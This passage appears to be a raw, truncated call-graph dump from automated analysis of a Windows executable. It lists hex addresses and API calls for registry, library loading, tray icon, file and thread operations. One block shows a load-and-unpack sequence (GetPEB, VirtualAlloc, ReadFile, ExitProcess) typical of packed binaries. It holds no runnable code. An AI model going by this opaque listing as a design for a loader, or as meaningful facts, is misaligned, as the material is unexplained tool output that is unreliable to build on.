fb51f7 22 API calls __fread_nolock 96404->96411 96407 fd00a3 29 API calls __onexit 96406->96407 96407->96399 96412 fb3b1c 96408->96412 96411->96404 96413 fb3b0f 96412->96413 96414 fb3b29 96412->96414 96413->96404 96414->96413 96415 fb3b30 RegOpenKeyExW 96414->96415 96415->96413 96416 fb3b4a RegQueryValueExW 96415->96416 96417 fb3b6b 96416->96417 96418 fb3b80 RegCloseKey 96416->96418 96417->96418 96418->96413 96419 fb2e37 96420 fba961 22 API calls 96419->96420 96421 fb2e4d 96420->96421 96498 fb4ae3 96421->96498 96423 fb2e6b 96424 fb3a5a 24 API calls 96423->96424 96425 fb2e7f 96424->96425 96426 fb9cb3 22 API calls 96425->96426 96427 fb2e8c 96426->96427 96512 fb4ecb 96427->96512 96430 fb2ead 96534 fba8c7 22 API calls __fread_nolock 96430->96534 96431 ff2cb0 96552 1022cf9 96431->96552 96433 ff2cc3 96435 ff2ccf 96433->96435 96578 fb4f39 96433->96578 96439 fb4f39 68 API calls 96435->96439 96436 fb2ec3 96535 fb6f88 22 API calls 96436->96535 96441 ff2ce5 96439->96441 96440 fb2ecf 96442 fb9cb3 22 API calls 96440->96442 96584 fb3084 22 API calls 96441->96584 96443 fb2edc 96442->96443 96536 fba81b 41 API calls 96443->96536 96446 fb2eec 96448 fb9cb3 22 API calls 96446->96448 96447 ff2d02 96585 fb3084 22 API calls 96447->96585 96450 fb2f12 96448->96450 96537 fba81b 41 API calls 96450->96537 96452 ff2d1e 96453 fb3a5a 24 API calls 96452->96453 96455 ff2d44 96453->96455 96454 fb2f21 96458 fba961 22 API calls 96454->96458 96586 fb3084 22 API calls 96455->96586 96457 ff2d50 96587 fba8c7 22 API calls __fread_nolock 96457->96587 96460 fb2f3f 96458->96460 96538 fb3084 22 API calls 96460->96538 96461 ff2d5e 96588 fb3084 22 API calls 96461->96588 96464 fb2f4b 96539 fd4a28 40 API calls 3 library calls 96464->96539 96465 ff2d6d 96589 fba8c7 22 API calls __fread_nolock 96465->96589 96467 fb2f59 96467->96441 96468 fb2f63 96467->96468 96540 fd4a28 40 API calls 3 library calls 96468->96540 96471 ff2d83 96590 fb3084 22 API calls 96471->96590 96472 fb2f6e 96472->96447 96474 fb2f78 96472->96474 96541 fd4a28 40 API calls 3 library calls 96474->96541 96476 ff2d90 96477 fb2f83 96477->96452 96478 fb2f8d 96477->96478 96542 fd4a28 40 API calls 3 library calls 96478->96542 96480 fb2f98 96481 fb2fdc 96480->96481 96543 fb3084 22 API calls 96480->96543 96481->96465 96482 fb2fe8 96481->96482 96482->96476 96546 fb63eb 22 API calls 96482->96546 96485 fb2fbf 96544 fba8c7 22 API calls __fread_nolock 96485->96544 96486 fb2ff8 96547 fb6a50 22 API calls 96486->96547 96489 fb2fcd 96545 fb3084 22 API calls 96489->96545 96490 fb3006 96548 fb70b0 23 API calls 96490->96548 96495 fb3021 96496 fb3065 96495->96496 96549 fb6f88 22 API calls 96495->96549 96550 fb70b0 23 API calls 96495->96550 96551 fb3084 22 API calls 96495->96551 96499 fb4af0 __wsopen_s 96498->96499 96500 fb6b57 22 API calls 96499->96500 96501 fb4b22 96499->96501 96500->96501 96511 fb4b58 96501->96511 96591 fb4c6d 96501->96591 96503 fb9cb3 22 API calls 96505 fb4c52 96503->96505 96504 fb9cb3 22 API calls 96504->96511 96506 fb515f 22 API calls 96505->96506 96509 fb4c5e 96506->96509 96507 fb4c6d 22 API calls 96507->96511 96508 fb515f 22 API calls 96508->96511 96509->96423 96510 fb4c29 96510->96503 96510->96509 96511->96504 96511->96507 96511->96508 96511->96510 96594 fb4e90 LoadLibraryA 96512->96594 96517 ff3ccf 96520 fb4f39 68 API calls 96517->96520 96518 fb4ef6 LoadLibraryExW 96602 fb4e59 LoadLibraryA 96518->96602 96522 ff3cd6 96520->96522 96523 fb4e59 3 API calls 96522->96523 96525 ff3cde 96523->96525 96624 fb50f5 96525->96624 96526 fb4f20 96526->96525 96527 fb4f2c 96526->96527 96529 fb4f39 68 API calls 96527->96529 96531 fb2ea5 96529->96531 96531->96430 96531->96431 96533 ff3d05 96534->96436 96535->96440 96536->96446 96537->96454 96538->96464 96539->96467 96540->96472 96541->96477 96542->96480 96543->96485 96544->96489 96545->96481 96546->96486 96547->96490 96548->96495 96549->96495 96550->96495 96551->96495 96553 1022d15 96552->96553 96554 fb511f 64 API calls 96553->96554 96555 1022d29 96554->96555 96755 1022e66 96555->96755 96558 fb50f5 40 API calls 96559 1022d56 96558->96559 96560 fb50f5 40 API calls 96559->96560 96561 1022d66 96560->96561 96562 fb50f5 40 API calls 96561->96562 96563 1022d81 96562->96563 96564 fb50f5 40 API calls 96563->96564 96565 1022d9c 96564->96565 96566 fb511f 64 API calls 96565->96566 96567 1022db3 96566->96567 96568 fdea0c ___std_exception_copy 21 API calls 96567->96568 96569 1022dba 96568->96569 96570 fdea0c ___std_exception_copy 21 API calls 96569->96570 96571 1022dc4 96570->96571 96572 fb50f5 40 API calls 96571->96572 96573 1022dd8 96572->96573 96574 10228fe 27 API calls 96573->96574 96575 1022dee 96574->96575 96576 1022d3f 96575->96576 96761 10222ce 79 API calls 96575->96761 96576->96433 96579 fb4f43 96578->96579 96583 fb4f4a 96578->96583 96762 fde678 96579->96762 96581 fb4f6a FreeLibrary 96582 fb4f59 96581->96582 96582->96435 96583->96581 96583->96582 96584->96447 96585->96452 96586->96457 96587->96461 96588->96465 96589->96471 96590->96476 96592 fbaec9 22 API calls 96591->96592 96593 fb4c78 96592->96593 96593->96501 96595 fb4ea8 GetProcAddress 96594->96595 96596 fb4ec6 96594->96596 96597 fb4eb8 96595->96597 96599 fde5eb 96596->96599 96597->96596 96598 fb4ebf FreeLibrary 96597->96598 96598->96596 96632 fde52a 96599->96632 96601 fb4eea 96601->96517 96601->96518 96603 fb4e6e GetProcAddress 96602->96603 96604 fb4e8d 96602->96604 96605 fb4e7e 96603->96605 96607 fb4f80 96604->96607 96605->96604 96606 fb4e86 FreeLibrary 96605->96606 96606->96604 96608 fcfe0b 22 API calls 96607->96608 96609 fb4f95 96608->96609 96610 fb5722 22 API calls 96609->96610 96611 fb4fa1 __fread_nolock 96610->96611 96612 ff3d1d 96611->96612 96613 fb50a5 96611->96613 96623 fb4fdc 96611->96623 96695 102304d 74 API calls 96612->96695 96684 fb42a2 CreateStreamOnHGlobal 96613->96684 96616 ff3d22 96618 fb511f 64 API calls 96616->96618 96617 fb50f5 40 API calls 96617->96623 96619 ff3d45 96618->96619 96620 fb50f5 40 API calls 96619->96620 96622 fb506e ISource 96620->96622 96622->96526 96623->96616 96623->96617 96623->96622 96690 fb511f 96623->96690 96625 fb5107 96624->96625 96626 ff3d70 96624->96626 96717 fde8c4 96625->96717 96629 10228fe 96738 102274e 96629->96738 96631 1022919 96631->96533 96635 fde536 ___BuildCatchObject 96632->96635 96633 fde544 96657 fdf2d9 20 API calls __dosmaperr 96633->96657 96635->96633 96637 fde574 96635->96637 96636 fde549 96658 fe27ec 26 API calls pre_c_initialization 96636->96658 96639 fde579 96637->96639 96640 fde586 96637->96640 96659 fdf2d9 20 API calls __dosmaperr 96639->96659 96649 fe8061 96640->96649 96643 fde554 __fread_nolock 96643->96601 96644 fde58f 96645 fde595 96644->96645 96646 fde5a2 96644->96646 96660 fdf2d9 20 API calls __dosmaperr 96645->96660 96661 fde5d4 LeaveCriticalSection __fread_nolock 96646->96661 96650 fe806d ___BuildCatchObject 96649->96650 96662 fe2f5e EnterCriticalSection 96650->96662 96652 fe807b 96663 fe80fb 96652->96663 96656 fe80ac __fread_nolock 96656->96644 96657->96636 96658->96643 96659->96643 96660->96643 96661->96643 96662->96652 96671 fe811e 96663->96671 96664 fe8177 96665 fe4c7d pre_c_initialization 20 API calls 96664->96665 96667 fe8180 96665->96667 96668 fe29c8 _free 20 API calls 96667->96668 96669 fe8189 96668->96669 96675 fe8088 96669->96675 96681 fe3405 11 API calls 2 library calls 96669->96681 96671->96664 96671->96675 96679 fd918d EnterCriticalSection 96671->96679 96680 fd91a1 LeaveCriticalSection 96671->96680 96672 fe81a8 96682 fd918d EnterCriticalSection 96672->96682 96676 fe80b7 96675->96676 96683 fe2fa6 LeaveCriticalSection 96676->96683 96678 fe80be 96678->96656 96679->96671 96680->96671 96681->96672 96682->96675 96683->96678 96685 fb42bc FindResourceExW 96684->96685 96689 fb42d9 96684->96689 96686 ff35ba LoadResource 96685->96686 96685->96689 96687 ff35cf SizeofResource 96686->96687 96686->96689 96688 ff35e3 LockResource 96687->96688 96687->96689 96688->96689 96689->96623 96691 fb512e 96690->96691 96692 ff3d90 96690->96692 96696 fdece3 96691->96696 96695->96616 96699 fdeaaa 96696->96699 96698 fb513c 96698->96623 96702 fdeab6 ___BuildCatchObject 96699->96702 96700 fdeac2 96712 fdf2d9 20 API calls __dosmaperr 96700->96712 96702->96700 96703 fdeae8 96702->96703 96714 fd918d EnterCriticalSection 96703->96714 96705 fdeac7 96713 fe27ec 26 API calls pre_c_initialization 96705->96713 96706 fdeaf4 96715 fdec0a 62 API calls 2 library calls 96706->96715 96709 fdeb08 96716 fdeb27 LeaveCriticalSection __fread_nolock 96709->96716 96711 fdead2 __fread_nolock 96711->96698 96712->96705 96713->96711 96714->96706 96715->96709 96716->96711 96720 fde8e1 96717->96720 96719 fb5118 96719->96629 96721 fde8ed ___BuildCatchObject 96720->96721 96722 fde92d 96721->96722 96723 fde900 ___scrt_fastfail 96721->96723 96724 fde925 __fread_nolock 96721->96724 96735 fd918d EnterCriticalSection 96722->96735 96733 fdf2d9 20 API calls __dosmaperr 96723->96733 96724->96719 96727 fde937 96736 fde6f8 38 API calls 4 library calls 96727->96736 96728 fde91a 96734 fe27ec 26 API calls pre_c_initialization 96728->96734 96731 fde94e 96737 fde96c LeaveCriticalSection __fread_nolock 96731->96737 96733->96728 96734->96724 96735->96727 96736->96731 96737->96724 96741 fde4e8 96738->96741 96740 102275d 96740->96631 96744 fde469 96741->96744 96743 fde505 96743->96740 96745 fde48c 96744->96745 96746 fde478 96744->96746 96751 fde488 __alldvrm 96745->96751 96754 fe333f 11 API calls 2 library calls 96745->96754 96752 fdf2d9 20 API calls __dosmaperr 96746->96752 96748 fde47d 96753 fe27ec 26 API calls pre_c_initialization 96748->96753 96751->96743 96752->96748 96753->96751 96754->96751 96756 1022e7a 96755->96756 96757 1022d3b 96756->96757 96758 fb50f5 40 API calls 96756->96758 96759 10228fe 27 API calls 96756->96759 96760 fb511f 64 API calls 96756->96760 96757->96558 96757->96576 96758->96756 96759->96756 96760->96756 96761->96576 96763 fde684 ___BuildCatchObject 96762->96763 96764 fde6aa 96763->96764 96765 fde695 96763->96765 96774 fde6a5 __fread_nolock 96764->96774 96775 fd918d EnterCriticalSection 96764->96775 96792 fdf2d9 20 API calls __dosmaperr 96765->96792 96767 fde69a 96793 fe27ec 26 API calls pre_c_initialization 96767->96793 96770 fde6c6 96776 fde602 96770->96776 96772 fde6d1 96794 fde6ee LeaveCriticalSection __fread_nolock 96772->96794 96774->96583 96775->96770 96777 fde60f 96776->96777 96778 fde624 96776->96778 96827 fdf2d9 20 API calls __dosmaperr 96777->96827 96784 fde61f 96778->96784 96795 fddc0b 96778->96795 96780 fde614 96828 fe27ec 26 API calls pre_c_initialization 96780->96828 96784->96772 96788 fde646 96812 fe862f 96788->96812 96791 fe29c8 _free 20 API calls 96791->96784 96792->96767 96793->96774 96794->96774 96796 fddc1f 96795->96796 96797 fddc23 96795->96797 96801 fe4d7a 96796->96801 96797->96796 96798 fdd955 __fread_nolock 26 API calls 96797->96798 96799 fddc43 96798->96799 96829 fe59be 62 API calls 5 library calls 96799->96829 96802 fde640 96801->96802 96803 fe4d90 96801->96803 96805 fdd955 96802->96805 96803->96802 96804 fe29c8 _free 20 API calls 96803->96804 96804->96802 96806 fdd976 96805->96806 96807 fdd961 96805->96807 96806->96788 96830 fdf2d9 20 API calls __dosmaperr 96807->96830 96809 fdd966 96831 fe27ec 26 API calls pre_c_initialization 96809->96831 96811 fdd971 96811->96788 96813 fe863e 96812->96813 96814 fe8653 96812->96814 96835 fdf2c6 20 API calls __dosmaperr 96813->96835 96816 fe868e 96814->96816 96820 fe867a 96814->96820 96837 fdf2c6 20 API calls __dosmaperr 96816->96837 96817 fe8643 96836 fdf2d9 20 API calls __dosmaperr 96817->96836 96832 fe8607 96820->96832 96821 fe8693 96838 fdf2d9 20 API calls __dosmaperr 96821->96838 96824 fde64c 96824->96784 96824->96791 96825 fe869b 96839 fe27ec 26 API calls pre_c_initialization 96825->96839 96827->96780 96828->96784 96829->96796 96830->96809 96831->96811 96840 fe8585 96832->96840 96834 fe862b 96834->96824 96835->96817 96836->96824 96837->96821 96838->96825 96839->96824 96841 fe8591 ___BuildCatchObject 96840->96841 96851 fe5147 EnterCriticalSection 96841->96851 96843 fe859f 96844 fe85c6 96843->96844 96845 fe85d1 96843->96845 96852 fe86ae 96844->96852 96867 fdf2d9 20 API calls __dosmaperr 96845->96867 96848 fe85cc 96868 fe85fb LeaveCriticalSection __wsopen_s 96848->96868 96850 fe85ee __fread_nolock 96850->96834 96851->96843 96869 fe53c4 96852->96869 96854 fe86c4 96882 fe5333 21 API calls 2 library calls 96854->96882 96855 fe86be 96855->96854 96856 fe86f6 96855->96856 96858 fe53c4 __wsopen_s 26 API calls 96855->96858 96856->96854 96859 fe53c4 __wsopen_s 26 API calls 96856->96859 96862 fe86ed 96858->96862 96863 fe8702 CloseHandle 96859->96863 96860 fe871c 96861 fe873e 96860->96861 96883 fdf2a3 20 API calls __dosmaperr 96860->96883 96861->96848 96865 fe53c4 __wsopen_s 26 API calls 96862->96865 96863->96854 96866 fe870e GetLastError 96863->96866 96865->96856 96866->96854 96867->96848 96868->96850 96870 fe53e6 96869->96870 96871 fe53d1 96869->96871 96875 fe540b 96870->96875 96886 fdf2c6 20 API calls __dosmaperr 96870->96886 96884 fdf2c6 20 API calls __dosmaperr 96871->96884 96874 fe53d6 96885 fdf2d9 20 API calls __dosmaperr 96874->96885 96875->96855 96876 fe5416 96887 fdf2d9 20 API calls __dosmaperr 96876->96887 96879 fe53de 96879->96855 96880 fe541e 96888 fe27ec 26 API calls pre_c_initialization 96880->96888 96882->96860 96883->96861 96884->96874 96885->96879 96886->96876 96887->96880 96888->96879 96889 fb3156 96892 fb3170 96889->96892 96893 fb3187 96892->96893 96894 fb31eb 96893->96894 96895 fb318c 96893->96895 96932 fb31e9 96893->96932 96897 ff2dfb 96894->96897 96898 fb31f1 96894->96898 96899 fb3199 96895->96899 96900 fb3265 PostQuitMessage 96895->96900 96896 fb31d0 DefWindowProcW 96934 fb316a 96896->96934 96941 fb18e2 10 API calls 96897->96941 96901 fb31f8 96898->96901 96902 fb321d SetTimer RegisterWindowMessageW 96898->96902 96904 ff2e7c 96899->96904 96905 fb31a4 96899->96905 96900->96934 96906 ff2d9c 96901->96906 96907 fb3201 KillTimer 96901->96907 96909 fb3246 CreatePopupMenu 96902->96909 96902->96934 96956 101bf30 34 API calls ___scrt_fastfail 96904->96956 96910 fb31ae 96905->96910 96911 ff2e68 96905->96911 96913 ff2dd7 MoveWindow 96906->96913 96914 ff2da1 96906->96914 96937 fb30f2 Shell_NotifyIconW ___scrt_fastfail 96907->96937 96908 ff2e1c 96942 fce499 42 API calls 96908->96942 96909->96934 96918 ff2e4d 96910->96918 96919 fb31b9 96910->96919 96955 101c161 27 API calls ___scrt_fastfail 96911->96955 96913->96934 96921 ff2da7 96914->96921 96922 ff2dc6 SetFocus 96914->96922 96918->96896 96954 1010ad7 22 API calls 96918->96954 96925 fb31c4 96919->96925 96926 fb3253 96919->96926 96920 ff2e8e 96920->96896 96920->96934 96921->96925 96927 ff2db0 96921->96927 96922->96934 96923 fb3214 96938 fb3c50 DeleteObject DestroyWindow 96923->96938 96924 fb3263 96924->96934 96925->96896 96943 fb30f2 Shell_NotifyIconW ___scrt_fastfail 96925->96943 96939 fb326f 44 API calls ___scrt_fastfail 96926->96939 96940 fb18e2 10 API calls 96927->96940 96932->96896 96935 ff2e41 96944 fb3837 96935->96944 96937->96923 96938->96934 96939->96924 96940->96934 96941->96908 96942->96925 96943->96935 96945 fb3862 ___scrt_fastfail 96944->96945 96957 fb4212 96945->96957 96949 ff3386 Shell_NotifyIconW 96950 fb3906 Shell_NotifyIconW 96961 fb3923 96950->96961 96951 fb38e8 96951->96949 96951->96950 96953 fb391c 96953->96932 96954->96932 96955->96924 96956->96920 96958 ff35a4 96957->96958 96959 fb38b7 96957->96959 96958->96959 96960 ff35ad DestroyIcon 96958->96960 96959->96951 96983 101c874 42 API calls _strftime 96959->96983 96960->96959 96962 fb393f 96961->96962 96963 fb3a13 96961->96963 96964 fb6270 22 API calls 96962->96964 96963->96953 96965 fb394d 96964->96965 96966 fb395a 96965->96966 96967 ff3393 LoadStringW 96965->96967 96968 fb6b57 22 API calls 96966->96968 96969 ff33ad 96967->96969 96970 fb396f 96968->96970 96977 fb3994 ___scrt_fastfail 96969->96977 96984 fba8c7 22 API calls __fread_nolock 96969->96984 96971 ff33c9 96970->96971 96972 fb397c 96970->96972 96973 fb6350 22 API calls 96971->96973 96972->96969 96975 fb3986 96972->96975 96978 ff33d7 96973->96978 96976 fb6350 22 API calls 96975->96976 96976->96977 96980 fb39f9 Shell_NotifyIconW 96977->96980 96978->96977 96979 fb33c6 22 API calls 96978->96979 96981 ff33f9 96979->96981 96980->96963 96982 fb33c6 22 API calls 96981->96982 96982->96977 96983->96951 96984->96977 96985 14dad98 96999 14d89e8 96985->96999 96987 14dae6c 97002 14dac88 96987->97002 96989 14dae95 CreateFileW 96991 14daee9 96989->96991 96992 14daee4 96989->96992 96991->96992 96993 14daf00 VirtualAlloc 96991->96993 96993->96992 96994 14daf1e ReadFile 96993->96994 96994->96992 96995 14daf39 96994->96995 96996 14d9c88 13 API calls 96995->96996 96998 14daf6c 96996->96998 96997 14daf8f ExitProcess 96997->96992 96998->96997 97005 14dbe98 GetPEB 96999->97005 97001 14d9073 97001->96987 97003 14dac91 Sleep 97002->97003 97004 14dac9f 97003->97004 97006 14dbec2 97005->97006 97006->97001 97007 fb1cad SystemParametersInfoW 97008 fb2de3 97009 fb2df0 __wsopen_s 97008->97009 97010 fb2e09 97009->97010 97011 ff2c2b ___scrt_fastfail 97009->97011 97012 fb3aa2 23 API calls 97010->97012 97014 ff2c47 GetOpenFileNameW 97011->97014 97013 fb2e12 97012->97013 97024 fb2da5 97013->97024 97016 ff2c96 97014->97016 97017 fb6b57 22 API calls 97016->97017 97019 ff2cab 97017->97019 97019->97019 97021 fb2e27 97042 fb44a8 97021->97042 97025 ff1f50 __wsopen_s 97024->97025 97026 fb2db2 GetLongPathNameW 97025->97026 97027 fb6b57 22 API calls 97026->97027 97028 fb2dda 97027->97028 97029 fb3598 97028->97029 97030 fba961 22 API calls 97029->97030 97031 fb35aa 97030->97031 97032 fb3aa2 23 API calls 97031->97032 97033 fb35b5 97032->97033 97034 fb35c0 97033->97034 97039 ff32eb 97033->97039 97035 fb515f 22 API calls 97034->97035 97037 fb35cc 97035->97037 97072 fb35f3 97037->97072 97040 ff330d 97039->97040 97078 fcce60 41 API calls 97039->97078 97041 fb35df 97041->97021 97043 fb4ecb 94 API calls 97042->97043 97044 fb44cd 97043->97044 97045 ff3833 97044->97045 97047 fb4ecb 94 API calls 97044->97047 97046 1022cf9 80 API calls 97045->97046 97048 ff3848 97046->97048 97049 fb44e1 97047->97049 97050 ff384c 97048->97050 97051 ff3869 97048->97051 97049->97045 97052 fb44e9 97049->97052 97053 fb4f39 68 API calls 97050->97053 97054 fcfe0b 22 API calls 97051->97054 97055 ff3854 97052->97055 97056 fb44f5 97052->97056 97053->97055 97071 ff38ae 97054->97071 97089 101da5a 82 API calls 97055->97089 97088 fb940c 136 API calls 2 library calls 97056->97088 97059 ff3862 97059->97051 97060 fb2e31 97061 ff3a5f 97062 ff3a67 97061->97062 97063 fb4f39 68 API calls 97062->97063 97092 101989b 82 API calls __wsopen_s 97062->97092 97063->97062 97064 fba4a1 22 API calls 97064->97071 97068 fb9cb3 22 API calls 97068->97071 97071->97061 97071->97062 97071->97064 97071->97068 97079 101967e 97071->97079 97082 fb3ff7 97071->97082 97090 10195ad 42 API calls _wcslen 97071->97090 97091 1020b5a 22 API calls 97071->97091 97073 fb3605 97072->97073 97077 fb3624 __fread_nolock 97072->97077 97075 fcfe0b 22 API calls 97073->97075 97074 fcfddb 22 API calls 97076 fb363b 97074->97076 97075->97077 97076->97041 97077->97074 97078->97039 97080 fcfe0b 22 API calls 97079->97080 97081 10196ae __fread_nolock 97080->97081 97081->97071 97083 fb400a 97082->97083 97087 fb40ae 97082->97087 97084 fcfe0b 22 API calls 97083->97084 97086 fb403c 97083->97086 97084->97086 97085 fcfddb 22 API calls 97085->97086 97086->97085 97086->97087 97087->97071 97088->97060 97089->97059 97090->97071 97091->97071 97092->97062 97093 ff2ba5 97094 ff2baf 97093->97094 97095 fb2b25 97093->97095 97097 fb3a5a 24 API calls 97094->97097 97121 fb2b83 7 API calls 97095->97121 97099 ff2bb8 97097->97099 97101 fb9cb3 22 API calls 97099->97101 97103 ff2bc6 97101->97103 97102 fb2b2f 97106 fb2b44 97102->97106 97109 fb3837 49 API calls 97102->97109 97104 ff2bce 97103->97104 97105 ff2bf5 97103->97105 97107 fb33c6 22 API calls 97104->97107 97108 fb33c6 22 API calls 97105->97108 97112 fb2b5f 97106->97112 97125 fb30f2 Shell_NotifyIconW ___scrt_fastfail 97106->97125 97110 ff2bd9 97107->97110 97111 ff2bf1 GetForegroundWindow ShellExecuteW 97108->97111 97109->97106 97113 fb6350 22 API calls 97110->97113 97117 ff2c26 97111->97117 97119 fb2b66 SetCurrentDirectoryW 97112->97119 97116 ff2be7 97113->97116 97118 fb33c6 22 API calls 97116->97118 97117->97112 97118->97111 97120 fb2b7a 97119->97120 97126 fb2cd4 7 API calls 97121->97126 97123 fb2b2a 97124 fb2c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 97123->97124 97124->97102 97125->97112 97126->97123 97127 fe8402 97132 fe81be 97127->97132 97131 fe842a 97137 fe81ef try_get_first_available_module 97132->97137 97134 fe83ee 97151 fe27ec 26 API calls pre_c_initialization 97134->97151 97136 fe8343 97136->97131 97144 ff0984 97136->97144 97140 fe8338 97137->97140 97147 fd8e0b 40 API calls 2 library calls 97137->97147 97139 fe838c 97139->97140 97148 fd8e0b 40 API calls 2 library calls 97139->97148 97140->97136 97150 fdf2d9 20 API calls __dosmaperr 97140->97150 97142 fe83ab 97142->97140 97149 fd8e0b 40 API calls 2 library calls 97142->97149 97152 ff0081 97144->97152 97146 ff099f 97146->97131 97147->97139 97148->97142 97149->97140 97150->97134 97151->97136 97155 ff008d ___BuildCatchObject 97152->97155 97153 ff009b 97209 fdf2d9 20 API calls __dosmaperr 97153->97209 97155->97153 97157 ff00d4 97155->97157 97156 ff00a0 97210 fe27ec 26 API calls pre_c_initialization 97156->97210 97163 ff065b 97157->97163 97162 ff00aa __fread_nolock 97162->97146 97164 ff0678 97163->97164 97165 ff068d 97164->97165 97166 ff06a6 97164->97166 97226 fdf2c6 20 API calls __dosmaperr 97165->97226 97212 fe5221 97166->97212 97169 ff0692 97227 fdf2d9 20 API calls __dosmaperr 97169->97227 97170 ff06ab 97171 ff06cb 97170->97171 97172 ff06b4 97170->97172 97225 ff039a CreateFileW 97171->97225 97228 fdf2c6 20 API calls __dosmaperr 97172->97228 97176 ff06b9 97229 fdf2d9 20 API calls __dosmaperr 97176->97229 97177 ff0781 GetFileType 97180 ff078c GetLastError 97177->97180 97181 ff07d3 97177->97181 97179 ff0756 GetLastError 97231 fdf2a3 20 API calls __dosmaperr 97179->97231 97232 fdf2a3 20 API calls __dosmaperr 97180->97232 97234 fe516a 21 API calls 2 library calls 97181->97234 97182 ff0704 97182->97177 97182->97179 97230 ff039a CreateFileW 97182->97230 97186 ff079a CloseHandle 97186->97169 97189 ff07c3 97186->97189 97188 ff0749 97188->97177 97188->97179 97233 fdf2d9 20 API calls __dosmaperr 97189->97233 97190 ff07f4 97193 ff0840 97190->97193 97235 ff05ab 72 API calls 3 library calls 97190->97235 97192 ff07c8 97192->97169 97197 ff086d 97193->97197 97236 ff014d 72 API calls 4 library calls 97193->97236 97196 ff0866 97196->97197 97198 ff087e 97196->97198 97199 fe86ae __wsopen_s 29 API calls 97197->97199 97200 ff00f8 97198->97200 97201 ff08fc CloseHandle 97198->97201 97199->97200 97211 ff0121 LeaveCriticalSection __wsopen_s 97200->97211 97237 ff039a CreateFileW 97201->97237 97203 ff0927 97204 ff095d 97203->97204 97205 ff0931 GetLastError 97203->97205 97204->97200 97238 fdf2a3 20 API calls __dosmaperr 97205->97238 97207 ff093d 97239 fe5333 21 API calls 2 library calls 97207->97239 97209->97156 97210->97162 97211->97162 97213 fe522d ___BuildCatchObject 97212->97213 97240 fe2f5e EnterCriticalSection 97213->97240 97215 fe527b 97241 fe532a 97215->97241 97217 fe5234 97217->97215 97218 fe5259 97217->97218 97222 fe52c7 EnterCriticalSection 97217->97222 97220 fe5000 __wsopen_s 21 API calls 97218->97220 97219 fe52a4 __fread_nolock 97219->97170 97221 fe525e 97220->97221 97221->97215 97244 fe5147 EnterCriticalSection 97221->97244 97222->97215 97223 fe52d4 LeaveCriticalSection 97222->97223 97223->97217 97225->97182 97226->97169 97227->97200 97228->97176 97229->97169 97230->97188 97231->97169 97232->97186 97233->97192 97234->97190 97235->97193 97236->97196 97237->97203 97238->97207 97239->97204 97240->97217 97245 fe2fa6 LeaveCriticalSection 97241->97245 97243 fe5331 97243->97219 97244->97215 97245->97243 97246 fbdee5 97249 fbb710 97246->97249 97250 fbb72b 97249->97250 97251 1000146 97250->97251 97252 10000f8 97250->97252 97271 fbb750 97250->97271 97291 10358a2 207 API calls 2 library calls 97251->97291 97255 1000102 97252->97255 97258 100010f 97252->97258 97252->97271 97289 1035d33 207 API calls 97255->97289 97270 fbba20 97258->97270 97290 10361d0 207 API calls 2 library calls 97258->97290 97261 fcd336 40 API calls 97261->97271 97262 10003d9 97262->97262 97266 fbba4e 97267 1000322 97295 1035c0c 82 API calls 97267->97295 97270->97266 97296 102359c 82 API calls __wsopen_s 97270->97296 97271->97261 97271->97266 97271->97267 97271->97270 97276 fbbbe0 40 API calls 97271->97276 97277 fbec40 207 API calls 97271->97277 97280 fba81b 41 API calls 97271->97280 97281 fcd2f0 40 API calls 97271->97281 97282 fca01b 207 API calls 97271->97282 97283 fd0242 5 API calls __Init_thread_wait 97271->97283 97284 fcedcd 22 API calls 97271->97284 97285 fd00a3 29 API calls __onexit 97271->97285 97286 fd01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97271->97286 97287 fcee53 82 API calls 97271->97287 97288 fce5ca 207 API calls 97271->97288 97292 fbaceb 23 API calls ISource 97271->97292 97293 100f6bf 23 API calls 97271->97293 97294 fba8c7 22 API calls __fread_nolock 97271->97294 97276->97271 97277->97271 97280->97271 97281->97271 97282->97271 97283->97271 97284->97271 97285->97271 97286->97271 97287->97271 97288->97271 97289->97258 97290->97270 97291->97271 97292->97271 97293->97271 97294->97271 97295->97270 97296->97262 97297 fb1044 97302 fb10f3 97297->97302 97299 fb104a 97338 fd00a3 29 API calls __onexit 97299->97338 97301 fb1054 97339 fb1398 97302->97339 97306 fb116a 97307 fba961 22 API calls 97306->97307 97308 fb1174 97307->97308 97309 fba961 22 API calls 97308->97309 97310 fb117e 97309->97310 97311 fba961 22 API calls 97310->97311 97312 fb1188 97311->97312 97313 fba961 22 API calls 97312->97313 97314 fb11c6 97313->97314 97315 fba961 22 API calls 97314->97315 97316 fb1292 97315->97316 97349 fb171c 97316->97349 97320 fb12c4 97321 fba961 22 API calls 97320->97321 97322 fb12ce 97321->97322 97323 fc1940 9 API calls 97322->97323 97324 fb12f9 97323->97324 97370 fb1aab 97324->97370 97326 fb1315 97327 fb1325 GetStdHandle 97326->97327 97328 fb137a 97327->97328 97329 ff2485 97327->97329 97332 fb1387 OleInitialize 97328->97332 97329->97328 97330 ff248e 97329->97330 97331 fcfddb 22 API calls 97330->97331 97333 ff2495 97331->97333 97332->97299 97377 102011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 97333->97377 97335 ff249e 97378 1020944 CreateThread 97335->97378 97337 ff24aa CloseHandle 97337->97328 97338->97301 97379 fb13f1 97339->97379 97342 fb13f1 22 API calls 97343 fb13d0 97342->97343 97344 fba961 22 API calls 97343->97344 97345 fb13dc 97344->97345 97346 fb6b57 22 API calls 97345->97346 97347 fb1129 97346->97347 97348 fb1bc3 6 API calls 97347->97348 97348->97306 97350 fba961 22 API calls 97349->97350 97351 fb172c 97350->97351 97352 fba961 22 API calls 97351->97352 97353 fb1734 97352->97353 97354 fba961 22 API calls 97353->97354 97355 fb174f 97354->97355 97356 fcfddb 22 API calls 97355->97356 97357 fb129c 97356->97357 97358 fb1b4a 97357->97358 97359 fb1b58 97358->97359 97360 fba961 22 API calls 97359->97360 97361 fb1b63 97360->97361 97362 fba961 22 API calls 97361->97362 97363 fb1b6e 97362->97363 97364 fba961 22 API calls 97363->97364 97365 fb1b79 97364->97365 97366 fba961 22 API calls 97365->97366 97367 fb1b84 97366->97367 97368 fcfddb 22 API calls 97367->97368 97369 fb1b96 RegisterWindowMessageW 97368->97369 97369->97320 97371 fb1abb 97370->97371 97372 ff272d 97370->97372 97373 fcfddb 22 API calls 97371->97373 97386 1023209 23 API calls 97372->97386 97375 fb1ac3 97373->97375 97375->97326 97376 ff2738 97377->97335 97378->97337 97387 102092a 28 API calls 97378->97387 97380 fba961 22 API calls 97379->97380 97381 fb13fc 97380->97381 97382 fba961 22 API calls 97381->97382 97383 